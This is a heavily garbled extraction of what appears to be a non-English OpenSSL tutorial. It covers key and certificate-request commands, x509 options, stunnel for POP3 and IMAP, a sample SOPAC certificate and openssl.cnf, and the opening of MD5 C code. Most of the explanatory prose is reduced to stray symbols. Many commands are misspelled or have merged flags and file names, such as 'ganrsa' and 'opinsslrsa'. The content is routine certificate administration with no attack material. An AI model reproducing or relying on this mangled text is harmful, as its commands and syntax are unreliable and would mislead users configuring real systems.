U
u4
B
F , B ) -,
U)
U)
&
B
F, B 2 " )
- Y
a )
9 ?560
6 ,
)
T
T
6 )
" ,
6
"
)
U)
3 6
" - Y
U)
)
SSL
6,
SSL
6,
P! ? "
0
Fv
s B
/
+:H
6,
667 P
[
U)
&'(
0, 5 7 P
[
U)
U)
)
,< Y SSL 9P " '
)
&'(
a,
6
)
SSL 9P " '
(5
&
/
a,< , 6 3 &
0, 5
" p B
/
%
€
0, 5
'
P
Qv 4
"
6
@
PG )
, @ ',< -,< —>
A 3
6
0,
6€,<
U)
2G
5! % H 6
12 0
6
3 5! % H 6
-,
( 2
0
3
1
&
6
U)
)
,
- )@
-,
6,<P
6
" ,G )
),
6
&
6, #
)
# ) #1 >
"
6
7 !89
) ,< -
: -, < - Y
)
,
u 6
6
)
1
5! , B @
: )
# ) #1 >
),
(
&
b
?@
>
L3 , B
6
0,< ,6 * ,
)
)
6
-,< +H )
)
U)
(
#P
< ?56
P
Q l '7c
(5
a
(E
*
+
"
6
2 " - Y
6, B E …
CRL ) CSR $ 6
,
( u4 -, #
&
E SSL
Shell n 9 "
0,<
DSA ) DH $ RSA
x.509
C
GH )
openssl
7 # " - Y
?
@
v 4
0,< ,6 *
OpenSSL
0,
?@ ,6 *
&
>
,
,
5! , B " - Y
-,< • 6
g
3
6
B
/ 2 €
0
2
&
U)
1 ( 2
),
0, 5
5! , B
,
TL 7
),
6
@
" DN ,B'
1 -, @ 6
< 5 ,
-,
1SSL
0, 5 'X
€,
6
"
&
6)
),
?@ N
&
),
R4
3 5! % H 6
U)
),
6
N1 B )
TLS ) SSL
E …
P. …
& )?
U)
?
…
S/MIME -,< &
6( u4
, …
a
openssl
"
) )
& …
'
Openssl command [ command_opts ][ command_args ]
2G
-
#B
5! \
,<
Y?
" –
0,
- 56
N -
7
6
@"
" - Y
&
1/ 6
,
)
;!
2 0 <
&
U)
?
passphrase
2 ?
)
)
S F ( 5 ?, E
,
) )
?, <
?
- Y
7
passout
" (,
"
6S
6
"
passin
R 10, <
0
<
6
, B2
<
"
passphrase
^
<
F?
5
# &' >/ passphrase
5L ?# 2 " - Y
6
& "
'
& b
passphrase 5B
0
d*
,
<
?
)
_ F) 3
passphrase
) )" ^
a
"
& ) 2
openssl
4? !
- Y passphrase 7 P! " …pass : passphrase
0 <
0 <
- Y passphrase ?, 3
" 0 < - Y ? &56 9
( 5 % < T)
L3 , B
6)
<
,< passphrase
# ?
1/ 2
6 6
)
F ( N6
] passout- passin
S
L3 , B
-" , -
0,
)
# " %P
H
6
G ?, 2 0
Y
2
" ?
L3 , B 2 " -,< , 1
2
,
3
%
L3 , B 2 " - Y
F ( N6 < - Y U )
9
6
2
N M 9 " 0,<P - Y % H ?,< -, " 7
,
M 9"
7
passphrase ,
^
&
",
2 ( 5 x509 ) genrsa req , rsa
"
H
P
10,
$, , 1 CSR
2 U
3b
6
#
0 5 - Y
),
0 < >
(E ?
, 1 ( N60 < - <
2 0
6
4
PU )
3
' )
0
),G -,!" - Y
("c SSL
),
0 <-
command
,G
L3 , B
, 5 T
2
< ,
- Y var :.
u
, " - env : var
pathname % 'T) : " -file : pathname
…passout ) …Passin & )
% ' "
0 <
passphrase ?,
3
()
) ) passphrase ?,
: " )
3
T) :
0 <
- Y passphrase ?,
3 , < number ?@ M G - 5<
- Y
F) 3
B'" -fd : number
0 <
e 'j 4
& "
#B
5! 2
<
>G - 56
manual 7 .Y
-, 3
,
) )" 9
0,<
5 stdin " - Y
Passphrase - stdin
"
x509 ) rep , rsa , genrsa 7
7
2
0 <
U4
,G
-
6 5 H
iX
@ T) ,
0
6
F)
@
a genres
%# <
2
RSA
B ( '0 )
L3 , B , 1
2
0,<
"
Openssl genrsa [-out filename] [-passout arg] [-des] [-des3] [-idea] [-f4]
[-3] [-rand file (s)] [numbits]
aT) ,
-out filename
<
< ?@
F) 3
L3 , B
- Y
F) 3 % '(
& 2 "
0,
<
-idea − des3 -des
&
IDEA
DES3, DES
0,
- Y
6 &
6
d*
< stdout
N1"
# "
L3 , B ?
-passout arg
DES3, DES
?
d*
a,
0
N1"
# "
$ <- Y , B ?
0 <
numbits
6
- Y
& 2 "
Šwp ?@ e Y 4 ,
, 1 passphrase ?), )
IDEA
&
F) 3 % 'passphrase
›,
d*
wqp‹ T 9
, BT 9
L3 , B
"
openssl genrsa - out rsakey. Pem 1024
) DES3
N1 -, < &
wqp‹ T 9
L3 , B
a,
"
, 1 W 3 passphrase
openssl ganrsa - out rsakey. Pem - passout pass : enter –pass-here-des 3
1024
a rsa
?
2 " - Y
6, B' ,
0
u
a,<
0)
@
. 0
" %#<
RSA
6, B
% ,P N
'
2
,
B ( '0 5 -,6
2
' "
6, B
, B =B*
opinsslrsa[− inf orm PEM NET DER][−outformPEM NET DER][−in filename][− pa sin arg]
[−out filename][− passoutarg][−sgckey][−des][−des3][−idea][idea][−text][−noout][− modulus]
[−check][− pubin][− pubout]
aT) ,
- inform
NER, PEM ,
,
NER, PEM?
,
d*
,
2 G
L3 , B
) )"
F) 3 , B
) ), B
% <
- Y
& 2 "
?@ paaaphrase , < -, < &
&
'
) )% '
0 <
- passin arg d *
'
PEM ?@ e Y 4 , 0,< DER
0
- infilename ,
) ), B
PEM ?@ e Y 4 , 0,< DER
0
- outform
2 G
6 &
-, 3
) ),B
0 <
- out filename "
0,
d*
<
,
-,< < ?@
F) 3
L3 , B
F) 3 , B
B'
- Y
& 2
0 <
- passout arg d *
?@ passphrase , < -, < &
&
F) 3 , B
0 <
− des − des 3 − idea
?
IDEA
&
DES, DES
6
0,
- text
7
-, < ,
1/
- noout
F) 3
- Y
-)8!
0,
N1"
# "
L3 , B
L3 , B
'
F) 3
& -
L3 , B 6,B'-,< , ( ' & 2 "
Y
0, < 5
- modulus
0,
0,
V4
6D F) 3
L3 , B
6,B'
6D
, B modulus 5 H
passphrase
"
Opnssl rsa –in inkey. Pem- passin file: pass- file- out outkey. Pem
-,
3
,
) ) " passphrase] ,
&
L3 , B
"
a_ <
openssl rsa- in inkey. Pem –des3 out outkey. Pem
a,6
?
L3 , B
7
.
"
openssl rsa-in inkey. Pem – text - noout
a req
, B, 1
?@ " ?
a,<
,
60 <
" %#<
2
- Y CSR
,
B ( '0 5 - Y &
2 "
6
)
L3
opensslrep[−inf otmPEM DER][−outformPEM[−in filename][− passinarg][−out filename]
[− passoutarg][−text][−noot][−noout][−verify][− modulus][−new][−rand file(s)]
[−nwkeyrsa: bits][−newkeydsa: fise][−nodes][−key filenane][−keyfotmPEM
DER][−keyoutfilename][−[md5 sha1 md2 ]][−configfilename][−x509][−days n]
[−asn1− kludge][−newhdr][−extensionssection][−reqextssection]
aT) ,
-inform NER, PEM ,
,
0
-outform NET, ,
) ),B
F) 3 CSR
2 G
PEM ?@ e Y 4 , 0,< DER
d*
CSR
) )"
) ) CSR
,
,
% <
&
) )% '
- Y
?@ paaaphrase , < -, < &
& 2
7
-,< ,
1/
-)8!
0,
-noout
-modulus
F) 3
CSR
6 D F) 3
'
d*
CSR
6,B'
F) 3
6, B'-, < , ( ' & 2 "
CSR %3
-, 3
) ) CSR
0 <
-text -
'
PEM
0 <
-passin arg
'
PEM ?@ e Y 4 , 0,< DER
,
0
-infilename "
2G
6 &
&
Y
0, < 5
6D
5!, B modulus
5 H
0,
-new 7 !89 )
E
<
CSR
0 <
- Y -, < d *
_0 <
-newkey rsa: bits CSR
-keyout filename
E ;!
'
,
–key
& 2 " - Y
) )" & "
, B " CSR
& "
,1 ,B
,< -,
) PSA
L3 , B
0,
d*
,B 6
<
< ?@
d*
]
& 2 " - Y
,G Bits 0 <
L3 , B
B'(
,
-x509
E root 6
CSR
<
F
,1
& 2
d*
& 2 " - Y
0 <
-days n
P! ?& n ,< -,< - Y –x509
6
& "
0,
, 1 CSR
a,
L3 , B
d*
" - Y
"
openssl req - new- key key. Pem - out req. pem.
a,
, 1 ? &56 9
CSR
)
L3 , B
"
openssl req - newkey rsa : 1024 – keyout key. Pem – out req. pem.
a,
, 1 ? &56 9
root 6
)
L3 , B
"
openssl req –x509- newkey rsa: 1024 – key. Pem- out cert. Pem.
x509
B ( '0 <
- Y
6
),
&
b
6
a,<
,
2 "
" %#<
2
opensslx509[−informDERPEMNET][−outform
DERPEMNET][−keyform
DER
PEM][−CAformDERPEM][−CAkeyform
DERPEM][−infilename
][−outfilenam
e]
[−hash][−subject
][−issuer][−nameopt
][−enddate
][−purpose
]
option][−email][−startdate
[−dates][−modulus][− fingerpr
int][−alias][−noout][−trustout
][−clrtrust
][−clrreject
]
[−addtrust
arg][−addreject
arg][−daysn][−signkeyfilename
][−x509toreq][−req][−CAfilename
]
[−CAkeyfilename
][−CAcreatese
rial][−CAserialfilename
][−text][−C][−md2− md5 − shal − mdc2]
[−clrext][−extfile][−extfilefilename
][−extensions
section]
a T) ,
- inform $PEM ,
,
- outform $PEM ,
,
'
NET
F) 3 CSR
2 G
'
PEM ?@ e Y 4 , 0,< DER
0
0,
-,
) ) CSR
2 G
PEM ?@ e Y 4 , 0,< DER
0
- in filename
6 &
d*
CSR
,
) ) CSR
3
% <
NET
) )% '
- Y
& 2 "
0 <
- out filename "
0,
d*
,
CSR
-,< < ?@
) ) CSR
) )"
B'
- Y
& 2
0 <
- text
7
-, < ,
1/
0,
- nooout
CSR
F) 3
CSR
-)8!
'
-, 3
F) 3
6, B'
& -
6, B
'-,< , ( ' & 2 " - Y
0, < 5
- modulus
F) 3
6
5! , B modulus 5 H
%3
0,
- serial
- hash 0,
0,
- subject
- issuer
6D F) 3
6D F) 3
0,
0,
6D
6
6
S/
6D F) 3
6D F) 3
6
6D
T
- 5<
( hash
,
6
(
-,
S/
(
- email
6 D F) 3
6
S/
# ) #1
4h @
0,
- startdate
0,
- enddate
- dates
6D z) 3
0,
0,
6D z) 3
6D F) 3
- fingerprint
0,
- signkey filename
6
>
6D F) 3
6
<
E filename
>
v
) ),
v
1E
;!
'
v
6
6
root 6
),
>
& 2 " - Y
H
L3 , B " - Y
0 <
- keyfrom ,
,
) )
L3 , B
PEM ?@ e Y 4 , ,< DER
0
- days n
d*
P! ?& n ,< -,< - Y –x509
6
% , PCSR
- Y
d*
6
–signkey
2
PEM
& "
0,
- x509toreq , B " 0,
&
'
& 2
-,< -
L3
0 <
- req
-,
3
) )? !
-,
3
) )
6
e Y 4
CSR
1/
& 2 " - Y
0 <
0 <
- CA filename ?
>
6
0 <
- Cakey filename " ?
-
Caserial
d*
filename
4( "
&
nB
G
& 2 b
6
d*
),
& 2 b
7 P
! % '2 (
4 -)8!
,
6
E
),
<
&
6CERTICATE T
0srl ,
- CA createserial
d*
>
0 <
),
6
- Y
L3 , B
<
- Y ?@
- 5< ) / % '
e Y 4 , 0,
&
6certificate T
^
6
- 5< % '
filename
- extfile filename ,
H ?@
6extention
- Y
0,
- extentions sectio
& 2 "
W 3 extention
6
d*
? )&'
0 <
a,6
?
6
B'
7 !89
- Y
"
openssl x509 – in cert. Pom-noout-text
a,6
?
6
T
- 5< "
openssl x509 – in cert. Pom-noout-serial
a,6
?
6
S/
(
"
openssl x509 – in cert. Pem – noout-subject
a,6
?
6
1E
>
"
– fingerprint openssl x509 – in cert. Pem – noout
% ,P DER
a,
' PEM
'"
6
"
openssl x509 – in cert. Pem – inform PEM – out cert. Der-outform DER
a,
% ,P CSR
6
"
openssl x509 –x509 toreq-in cert. Pom –out req. pem – signkey key. Pem
a,
% ,Proot 6
CSR
"
openssl x509 – req-in careq.pom-signkey key. Pem-out cacert.pom
>
6
),
&
L3 , B ) 6
" - Y
CSR
"
a,
openssl x509 –req – in req. pem – CA cacert. Pem – CA key key . pemCacreateserial
F) 1/ ) SSL b
a
-,< & 7 !89 ?
)
,
#4
? !
.
?
@2
&
"
H ) ,<
" ,
T) ,
" U4 -
1/ )
a
2
U)
…
], 5 T
#
,
U)
5 -, <
- < Stunnel
) )
6
F) 3
' ),
,<
6
@
9
] ,<
-, < &
"
'
- Y SSL Wrapper
\ 2 0
E n 9 2, ?
)
I
0_ IMAP )
6 &'(
7Y
SLL
5 SSL
1/ 2
"
,
?
SSl " - Y ?#
'X ?@
) '
6 &'(
I
0 _Apache O) )
b' 1/ 2
7 !89 T
6U )
SSL 7 #
) ,<
0
&
=B*
'
a
'
)
)
L3 , B
L3 , B
,1
openssl genrsa – out key. Pim 1024
a CSR
0
L3 , B b
?@ ?
>
a
6
'
),
CSR ?
&
" - Y CSR ?
"
,1
'
>
openssl x509 – req – in csr. Pem – signkey key key. Pem – pem – out .
pem – days 365
POP3 )
- 56
Stunnel &'(
SSL " -,Y - . \ X
" POP3 )
?,<
- 56 SSL " - Y
a
2#5 n 9 )
2<)
5 H2
<
-
iX
Stunnel " 0 <
- Y
7
4
@)-
,6
A
a
'
{{Š - 5 < 7
wwq - 5 < 7 4
H
)
6script
7
4"
b
,
7 !89 Stunnel
-, < &
7 !89 2 ) ,
"
7
Y wwq - 5<
2
0, < A"
4
Stunnel-d995 –p/usr/ local/ssl/certs/stunnnel. Pem – r localhost: 110
U)
,
)"
'
7
-,< & 7 !89 Stunnel
{{Š - 5< 7 4 "
2
0,
F -, <
&
a
!89 2 A"
H
4
6Script
7
Stunnel-d995 –p /usr/local/ssl/certs/stunnel.pim-l/usr / sbin/imapd
)
L3 , B % < S
stunnel.pem c
% '
, B " , G Stunnel.pem % ' 0, <
0,<
<
_ -,
F) ,
&
)
7
13 :
6
] )
) W 3 L*< ¢
^P 2
0,
,
— )
? 59 5 <
? 3 IE
"
,
6
6
, 5 '—
"
5<
- P< ?#
!89 % < ,
: 56
6
0_ B
# %. $ P! 7, $ % 5 h @ $ ( , 56$
- 5 >
7 !89 2
L*< 1 E
hash
% H 56
? 4
)
H
,
> )
5<
'2
F T/
6
?@ S/
)h @
5! , B % < 6
I
" - Y )
6
CA 0
5! - ›,
) > )-
R ,
$O)
CA
' 7 !89
7 )&B "
5<
@
&
L3
0
@^
2 0,
—L*<
—
5<
, 5
)
R
6 6
) 1E
N
2 2 `560
0,<
$, - 5
^P
< ? 59
6 ],
7 !89 )
),
N c 5G 5<
" €,<
$, 6 ? 59 )
L3
—6
M 9 ?@ — › GH ) @ €, - ›
'2 ) -
)
6
" ,G & )
a Certificate
? I
6
5<
5! &
5
'
N 56
6
c 5G 0,<
C
2
SSL
(Certificate Autority)
6>
56
1% <
a
"7
—6
¢ 2 * A)
CA.pl −newcert
(openssl req −config /etc/openssl.cnf −new −x509 −keyout newreq.pem \
−out newreq.pem −days 365)
#
b
F
6
6
6
0
,
( 5 0,
? 59 % H
g
5 <$
1E
u) j
-,< >
3 6
0,
?@
66 6
>
"
)% HC
8
-, < >
$,
T
6
6
) > A 3
\ 2 " 6CA
6
a
6
6
2 "
#
"
5
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=FJ, ST=Fiji, L=Suva, O=SOPAC, OU=ICT, CN=SOPAC Root
CA/[email protected]
Not Before: Nov 20 05:47:44 2001 GMT
Not After : Nov 20 05:47:44 2002 GMT
Subject:
C=FJ,
ST=Fiji,
L=Suva,
O=SOPAC,
CN=www.sopac.org/[email protected]
Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:ba:54:2c:ab:88:74:aa:6b:35:a5:a9:c1:d0:5a:
9b:fb:6b:b5:71:bc:ef:d3:ab:15:cc:5b:75:73:36:
b8:01:d1:59:3f:c1:88:c0:33:91:04:f1:bf:1a:b4:
7a:c8:39:c2:89:1f:87:0f:91:19:81:09:46:0c:86:
08:d8:75:c4:6f:5a:98:4a:f9:f8:f7:38:24:fc:bd:
94:24:37:ab:f1:1c:d8:91:ee:fb:1b:9f:88:ba:25:
da:f6:21:7f:04:32:35:17:3d:36:1c:fb:b7:32:9e:
42:af:77:b6:25:1c:59:69:af:be:00:a1:f8:b0:1a:
6c:14:e2:ae:62:e7:6b:30:e9
Exponent: 65537 (0x10001)
X509v3 extensions:
OU=ICT,
Public
Key
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
FE:04:46:ED:A0:15:BE:C1:4B:59:03:F8:2D:0D:ED:2A:E0:ED:F9:2F
X509v3 Authority Key Identifier:
keyid:E6:12:7C:3D:A1:02:E5:BA:1F:DA:9E:37:BE:E3:45:3E:9B:AE:E5
:A6
DirName:/C=FJ/ST=Fiji/L=Suva/O=SOPAC/OU=ICT/CN=SOPAC Root
CA/Email=administrator@serial:00
Signature Algorithm: md5WithRSAEncryption
34:8d:fb:65:0b:85:5b:e2:44:09:f0:55:31:3b:29:2b:f4:fd:
aa:5f:db:b8:11:1a:c6:ab:33:67:59:c1:04:de:34:df:08:57:
2e:c6:60:dc:f7:d4:e2:f1:73:97:57:23:50:02:63:fc:78:96:
34:b3:ca:c4:1b:c5:4c:c8:16:69:bb:9c:4a:7e:00:19:48:62:
e2:51:ab:3a:fa:fd:88:cd:e0:9d:ef:67:50:da:fe:4b:13:c5:
0c:8c:fc:ad:6e:b5:ee:40:e3:fd:34:10:9f:ad:34:bd:db:06:
ed:09:3d:f2:a6:81:22:63:16:dc:ae:33:0c:70:fd:0a:6c:af:
bc:5a
−−−−−BEGIN CERTIFICATE−−−−−
MIIDoTCCAwqgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBiTELM
AkGA1UEBhMCRkox
DTALBgNVBAgTBEZpamkxDTALBgNVBAcTBFN1dmExDjAMBgNVB
AoTBVNPUEFDMQww
CgYDVQQLEwNJQ1QxFjAUBgNVBAMTDVNPUEFDIFJvb3QgQ0ExJ
jAkBgkqhkiG9w0B
CQEWF2FkbWluaXN0cmF0b3JAc29wYWMub3JnMB4XDTAxMTEyM
DA1NDc0NFoXDTAy
MTEyMDA1NDc0NFowgYkxCzAJBgNVBAYTAkZKMQ0wCwYDVQQIE
wRGaWppMQ0wCwYD
VQQHEwRTdXZhMQ4wDAYDVQQKEwVTT1BBQzEMMAoGA1UECxMDS
UNUMRYwFAYDVQQD
Ew13d3cuc29wYWMub3JnMSYwJAYJKoZIhvcNAQkBFhdhZG1pb
mlzdHJhdG9yQHNv
cGFjLm9yZzCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAu
lQsq4h0qms1panB
0Fqb+2u1cbzv06sVzFt1cza4AdFZP8GIwDORBPG/GrR6yDnCi
R+HD5EZgQlGDIYI
2HXEb1qYSvn49zgk/L2UJDer8RzYke77G5+IuiXa9iF/BDI1F
z02HPu3Mp5Cr3e2
JRxZaa++AKH4sBpsFOKuYudrMOkCAwEAAaOCARUwggERMAkGA
1UdEwQCMAAwLAYJ
YIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZ
mljYXRlMB0GA1Ud
DgQWBBT+BEbtoBW+wUtZA/gtDe0q4O35LzCBtgYDVR0jBIGuM
IGrgBTmEnw9oQLl
uh/anje+40U+m67lpqGBj6SBjDCBiTELMAkGA1UEBhMCRkoxD
TALBgNVBAgTBEZp
amkxDTALBgNVBAcTBFN1dmExDjAMBgNVBAoTBVNPUEFDMQwwC
gYDVQQLEwNJQ1Qx
FjAUBgNVBAMTDVNPUEFDIFJvb3QgQ0ExJjAkBgkqhkiG9w0BC
QEWF2FkbWluaXN0
cmF0b3JAc29wYWMub3JnggEAMA0GCSqGSIb3DQEBBAUAA4GBA
DSN+2ULhVviRAnw
VTE7KSv0/apf27gRGsarM2dZwQTeNN8IVy7GYNz31OLxc5dXI
1ACY/x4ljSzysQb
xUzIFmm7nEp+ABlIYuJRqzr6/YjN4J3vZ1Da/ksTxQyM/K1ut
e5A4/00EJ+tNL3b
Bu0JPfKmgSJjFtyuMwxw/Qpsr7xa
−−−−−END CERTIFICATE−−−−−
nB
G
5! , B 0
n:
# " ? 59
,B 6
T
?@
# 0, ›
6
, B
0
B
. "
B
.
#
]
<
- Y
6
6
'X
R &
T
-,
'-,< ,
?@ S/
b
-, <
-,< > ( 4
F
6
6
b'
2 0 <-
,
P! $
N 56
2 S/
7 !89
F " , P & 6, B 2
&
' 56 ) / 6
)/
> ? ") 6
2
N %.
- Y
GF
"
,
#
3
L3
L3 , B N 7 P
!
6-
) 6 6
, P)
$,
<
R & ( 4b
. ,
)_
L3
a OpenSSL ,
#4% '
#−−−Begin−−−
#
# OpenSSL example configuration file.
# This is mostly being used for generation of certificate requests.
#
RANDFILE = $ENV::HOME/.rnd
oid_file = $ENV::HOME/.oid
oid_section = new_oids
# To use this configuration file with the "−extfile" option of the
# "openssl x509" utility, name here the section containing the
# X.509v3 extensions to use:
# extensions =
# (Alternatively, use a configuration file that has only
# X.509v3 extensions in its main [= default] section.)
[ new_oids ]
# We can add new OIDs in here for use by '
ca'and '
req'
.
# Add a simple OID like this:
# testoid1=1.2.3.4
# Or use config file substitution like this:
# testoid2=${testoid1}.5.6
###########################################################
#########
[ ca ]
default_ca = CA_default # The default ca section
###########################################################
#########
[ CA_default ]
dir = /var/ssl # Where everything is kept
certs = $dir/certs # Where the issued certs are kept
crl_dir = $dir/crl # Where the issued crl are kept
database = $dir/index.txt # database index file.
new_certs_dir = $dir/newcerts # default place for new certs.
certificate = $dir/cacert.pem # The CA certificate
serial = $dir/serial # The current serial number
crl = $dir/crl.pem # The current CRL
private_key = $dir/private/cakey.pem # The private key
RANDFILE = $dir/private/.rand # private random number file
x509_extensions = usr_cert # The extentions to add to the cert
# Extensions to add to a CRL. Note: Netscape communicator chokes on
V2 CRLs
# so this is commented out by default to leave a V1 CRL.
# crl_extensions = crl_ext
default_days = 365 # how long to certify for
default_crl_days= 7 # how long before next CRL
default_md = sha1 # which md to use.
preserve = no # keep passed DN ordering
# A few difference way of specifying how similar the request should look
# For type CA, the listed attributes must be the same, and the optional
# and supplied fields are just that :−)
policy = policy_match
# For the CA policy
[ policy_match ]
countryName = match
stateOrProvinceName = optional
localityName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional
# For the '
anything'policy
# At this point in time, you must list all acceptable '
object'
# types.
[ policy_anything ]
countryName = optional
stateOrProvinceName = optional
localityName = optional
organizationName = optional
organizationalUnitName = optional
commonName = supplied
emailAddress = optional
###########################################################
#########
[ req ]
default_bits = 1024
default_keyfile = privkey.pem
distinguished_name = req_distinguished_name
attributes = req_attributes
default_md = sha1
x509_extensions = v3_ca # The extentions to add to the self signed cert
# Passwords for private keys if not present they will be prompted for
# input_password = secret
# output_password = secret
# This sets a mask for permitted string types. There are several options.
# default: PrintableString, T61String, BMPString.
# pkix : PrintableString, BMPString.
# utf8only: only UTF8Strings.
# nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings).
# MASK:XXXX a literal mask value.
# WARNING: current versions of Netscape crash on BMPStrings or
UTF8Strings
# so use this option with caution!
string_mask = nombstr
# req_extensions = v3_req # The extensions to add to a certificate request
[ req_distinguished_name ]
countryName = Country Name (2 letter code)
countryName_default = FJ
countryName_min = 2
countryName_max = 2
stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = Fiji
localityName = Locality Name (eg, city)
localityName_default = Suva
0.organizationName = Organization Name (eg, company)
0.organizationName_default = SOPAC
# we can do this but it is not needed normally :−)
#1.organizationName = Second Organization Name (eg, company)
#1.organizationName_default = World Wide Web Pty Ltd
organizationalUnitName = Organizational Unit Name (eg, section)
organizationalUnitName_default = ITU
commonName = Common Name (eg, YOUR name)
commonName_max = 64
emailAddress = Email Address
emailAddress_max = 40
# SET−ex3 = SET extension number 3
[ req_attributes ]
challengePassword = A challenge password
challengePassword_min = 4
challengePassword_max = 20
unstructuredName = An optional company name
[ usr_cert ]
# These extensions are added when '
ca'signs a request.
# This goes against PKIX guidelines but some CAs do it and some
software
# requires this to avoid interpreting an end user certificate as a CA.
basicConstraints=CA:FALSE
# Here are some examples of the usage of nsCertType. If it is omitted
# the certificate can be used for anything *except* object signing.
# This is OK for an SSL server.
# nsCertType = server
# For an object signing certificate this would be used.
# nsCertType = objsign
# For normal client use this is typical
# nsCertType = client, email
# and for everything including object signing:
# nsCertType = client, email, objsign
# This is typical in keyUsage for a client certificate.
# keyUsage = nonRepudiation, digitalSignature, keyEncipherment
# This will be displayed in Netscape'
s comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"
# PKIX recommendations harmless if included in all certificates.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid,issuer:always
# This stuff is for subjectAltName and issuerAltname.
# Import the email address.
# subjectAltName=email:copy
# Copy subject details
# issuerAltName=issuer:copy
# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/
# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac−ca.crl
# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?
# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?
# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html
# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt
# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac−ca.crl
[ v3_ca ]
# Extensions for a typical CA
# PKIX recommendation.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid:always,issuer:always
# This is what PKIX recommends but some broken software chokes on
critical
# extensions.
# basicConstraints = critical,CA:true
# So we do this instead.
basicConstraints = CA:true
# Key usage: this is typical for a CA certificate. However since it will
# prevent it being used as an test self−signed certificate it is best
# left out by default.
# keyUsage = cRLSign, keyCertSign
# Some might want this also
# nsCertType = sslCA, emailCA
# Include email address in subject alt name: another PKIX
recommendation
# subjectAltName=email:copy
# Copy issuer details
# issuerAltName=issuer:copy
# RAW DER hex encoding of an extension: beware experts only!
# 1.2.3.5=RAW:02:03
# You can even override a supported extension:
# basicConstraints= critical, RAW:30:03:01:01:FF
# This will be displayed in Netscape'
s comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"
# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/
# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac−ca.crl
# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?
# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?
# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html
# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt
# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac−ca.crl
[ crl_ext ]
# CRL extensions.
# Only issuerAltName and authorityKeyIdentifier make any sense in a
CRL.
# issuerAltName=issuer:copy
authorityKeyIdentifier=keyid:always,issuer:always
#−−−−End−−−−
a =B*
a
6
_CA]
6
,F 'X
"
)
2 )
SL A)
6
,
Openssl. X 509 - in cacert.pem – out cacert.crt
a "h @
,6
H?
3
O)
-,< E % '2
http://yoursite.com/ssl/cacert.crt
?
< crt \ "
,<
0 <– R
•Y
,
$,
) - 3•
H
.
,
" U4
@
P
<
5<
6 #6•Y "
& 5 <0 <
")
6
3
6
@
B
F
")
0, 5 'X
,
" j
? •Y b
update
'G
3-
B
5F "
)
- 3•S
B Netscapeb
2 0, K5
%.
? 5 5<
@ ) ,6
d *
SL %/
N4
)
<
(E
6& \ , C
5 / SL B
/ ? 4
%P
H" ,
d*
0 … ) 6,› 3
5
$%5
5!
@
6> $
?
'X
0,
6
,
F)
)
SL
),
<
SL A)
O) "
0, 5
YB*
("c – 6—
6
,
3% !
') #
—6
5<
<
6
), Nh5
-N4
#
F ') #
P
# 7, ,
#
5<
)
a Mozilla ) Netscape
:
O)
#
-
,
,
"
,6 * ?
O)
$ ) 42
5< )
-,< - @ 5< 6
F?
0
6
b
2 `56, 5
6
3 j< 4
) ),
O) ) , CA 6
CA ,
<
)
$
"
" , <
MIME \ "
B'
7 #
6
- Y
O) $ % !
a Galeon
)
,< ,6 3
6
2 "
, –6
SL A)
HTML 5F
0
" )
F) Galeon
,
6
6
" $,
% 5! Mozilla
,
3 & 2
CH Galeon
),
a lnternet Explorer
I'/ )
" 0
9
6 D ?@ S L
@
2
2 T
% ') -
3
6
&
d*
,
B-
: IE _-, < Z>
6,G
6
3]
I.12 " ,
F SSL %•) 4 " ,
— )
h @
)
- Y
SL A)
?
)
b
) % ' ) 0, K5 - 3• 3
,
3 6
SL
5!
,6 3 5 !
6
2 # KE @
6 6
,< -,< Z> CA
0, K5 - Y
6-
aC?"
#include <std/disclaimer.h>
#include <stdio.h>
#include <stdlib.h>
typedef unsigned int UINT4;
#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
SSL % '–"
- 4" –
5
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21
#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))
/* ROTATE_LEFT rotates x left n bits.
*/
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
Rotation is separate from addition to prevent recomputation.
*/
#define FF(a, b, c, d, x, s, ac) { \
(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
